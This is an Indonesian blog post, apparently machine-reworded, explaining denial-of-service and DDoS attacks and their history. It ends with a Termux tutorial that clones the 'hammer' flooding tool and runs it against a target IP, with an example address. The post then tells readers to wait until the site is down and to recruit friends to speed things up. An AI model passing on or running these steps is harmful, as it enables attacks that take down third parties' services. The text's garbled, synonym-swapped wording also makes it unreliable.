Pengertian dan Cara Menggunakan DDOS

PENGERTIAN DAN CARA MENGGUNAKAN DDOS VIA TERMUX

Sebelum menuju tutorialnya admin jelaskan terlebih dahulu tentang pengertian DDos dan apa itu DDOS.

Serangan DoS (bahasa Inggris: denial-of-service attacks') merupakan jenis serangan terhadap sebuah komputer atau server pada dalam jaringan internet menggunakan cara menghabiskan sumber (resource) yang dimiliki sang komputer tersebut sampai komputer tadi nir dapat menjalankan kegunaannya menggunakan sahih sehingga secara tidak eksklusif mencegah pengguna lain untuk memperoleh akses layanan dari personal komputer  yg diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba buat mencegah akses seorang pengguna terhadap sistem atau jaringan menggunakan memakai beberapa cara, yakni sebagai berikut:

1. Membanjiri lalu lintas jaringan menggunakan banyak data sehingga kemudian lintas jaringan yg tiba dari pengguna yang terdaftar sebagai nir bisa masuk ke dalam sistem jaringan. Teknik ini diklaim menjadi traffic flooding.

2. Membanjiri jaringan dengan banyaknya request terhadap sebuah layanan jaringan yg disedakan sang sebuah host sebagai akibatnya request yg tiba berdasarkan pengguna terdaftar tidak dapat dilayani sang layanan tersebut. Teknik ini dianggap menjadi request flooding.

3. Merusak komunikasi antara sebuah host & kliennya yang terdaftar menggunakan menggunakan poly cara, termasuk menggunakan membarui informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awalnya merupakan agresi SYN Flooding Attack, yg pertama kali ada pada tahun 1996 & mengeksploitasi terhadap kelemahan yang terdapat di pada protokol Transmission Control Protocol (TCP).

Serangan-agresi lainnya akhirnya dikembangkan guna mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk berakibat sistem, layanan jaringan, atau pelaksanaan tadi tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yg dipakai untuk melakukan agresi DoS pun poly dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk pada antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP adalah agresi DoS yg tak jarang dilakukan. Hal ini ditimbulkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk pada sistem, mengunci galat seorang akun pengguna yang valid, atau memodifikasi tabel routing pada sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yg kemungkinan penetrasinya kecil, apalagi apabila sistem jaringan tadi sudah diperkuat.

Penolakan Layanan Dos

Penolakan Layanan secara Terdistribusi (bahasa Inggris: Distributed Denial of Service (DDos)) adalah galat satu jenis agresi Denial of Service yang memakai banyak host penyerang (baik itu menggunakan personal komputer  yg didedikasikan buat melakukan penyerangan atau personal komputer  yang "dipaksa" menjadi zombie) buat menyerang satu butir host sasaran pada sebuah jaringan.

Serangan Denial of Service klasik bersifat "satu versus satu", sebagai akibatnya diharapkan sebuah host yg bertenaga (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri kemudian lintas host sasaran sehingga mencegah klien yang valid buat mengakses layanan jaringan dalam server yg dijadikan target serangan. Serangan DDoS ini memakai teknik yg lebih canggih dibandingkan dengan agresi Denial of Service yang klasik, yakni menggunakan menaikkan agresi beberapa kali menggunakan memakai beberapa butir personal komputer  sekaligus, sebagai akibatnya bisa mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "nir bermanfaat sama sekali" bagi klien.

Serangan DDoS pertama kali timbul pada tahun 1999, tiga tahun selesainya serangan Denial of Service yg klasik ada, dengan menggunakan agresi SYN Flooding, yang mengakibatkan beberapa server web pada Internet mengalami "downtime". Pada awal Februari 2000, sebuah agresi yang akbar dilakukan sebagai akibatnya beberapa situs web terkenal misalnya Amazon, CNN, eBay, & Yahoo! Mengalami "downtime" selama beberapa jam.

Serangan yg lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 menurut 13 root DNS Server diserang menggunakan memakai DDoS yg sangat akbar yg disebut menggunakan "Ping Flood". Pada puncak  serangan, beberapa server tersebut dalam tiap detiknya menerima lebih dari 150.000 request paket Internet Control Message Protocol (ICMP). Untungnya, lantaran agresi hanya dilakukan selama 1/2 jam saja, kemudian lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya nir semuanya mengalami kerusakan).

Tidak seperti akibatnya yang sebagai suatu kerumitan yg sangat tinggi (bagi para administrator jaringan dan server yg melakukan pemugaran server dampak berdasarkan serangan), teori & praktik buat melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

Menjalankan tool (umumnya berupa program (aplikasi) mini  ) yg secara otomatis akan memindai jaringan buat menemukan host-host yg rentan (vulnerable) yg terkoneksi ke Internet. Setelah host yg rentan ditemukan, tool tadi bisa menginstalasikan salah  satu jenis berdasarkan Trojan Horse yang dianggap menjadi DDoS Trojan, yg akan menyebabkan host tersebut sebagai zombie yang dapat dikontrol secara jarak jauh (bahasa Inggris: remote) sang sebuah personal komputer  master yg digunakan sang si penyerang asli buat melancarkan serangan. Beberapa tool (perangkat lunak yang digunakan buat melakukan agresi serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yg dapat diunduh secara bebas pada Internet.

Ketika si penyerang merasa sudah mendapatkan jumlah host yg cukup (menjadi zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master buat menaruh frekuwensi penyerangan terhadap jaringan target atau host sasaran. Serangan ini umumnya dilakukan menggunakan menggunakan beberapa bentuk SYN Flood atau skema agresi DoS yg sederhana, namun lantaran dilakukan sang banyak host zombie, maka jumlah kemudian lintas jaringan yang diciptakan sang mereka adalah sangat akbar, sebagai akibatnya "memakan habis" seluruh sumber daya Transmission Control Protocol.

Ya Hampir semua platform komputer dapat dibajak menjadi sebuah zombie buat melakukan serangan misalnya ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX bisa menjadi zombie, jika memang sistem tadi atau pelaksanaan yg berjalan di atasnya mempunyai kelemahan yang dieksploitasi oleh penyerang.

Beberapa contoh Serangan DoS lainnya adalah:

  1. Serangan Buffer Overflow, mengirimkan data yg melebihi kapasitas sistem, contohnya paket ICMP yg ukuran sangat akbar.
  2. Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.
  3. Serangan Teardrop, mengirimkan paket IP menggunakan nilai offsetyang membingungkan.
  4. Serangan Smurf, mengirimkan paket ICMP bervolume besar  dengan alamat host lain.
  5. ICMP Flooding

Nah untuk langkah-langkahnya simak di bawah ini:
1. Download TERMUX terlebih dahulu, klik button di bawah ini. 


2. Jalankan aplikasinya dan ketikan perintah dibawah ini:
 $ pkg install git
$ pkg install python
$ git clone http://github.com/cyweb/hammer
$ cd hammer
$ python3 hammer.py -s (IP target) -p 80 -t 135
 Contoh : python3 hammer.py -s 172.217.194.100 -p 80 - 135


3. Tunggu sampai situs benar-benar sudah kena.



4. Ajak teman-teman kalian untuk mempercepat waktu hehe.

Lebih baru Lebih lama